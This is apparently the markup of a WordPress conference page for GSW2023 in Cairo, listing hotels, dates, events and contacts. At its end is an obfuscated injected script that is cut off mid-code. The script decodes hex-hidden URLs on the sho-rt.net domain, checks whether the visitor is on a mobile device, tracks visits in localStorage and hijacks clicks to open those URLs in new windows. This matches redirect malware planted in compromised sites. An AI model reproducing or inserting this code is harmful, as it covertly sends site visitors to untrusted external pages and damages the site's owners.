More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\n<p><img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\n<p><img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const 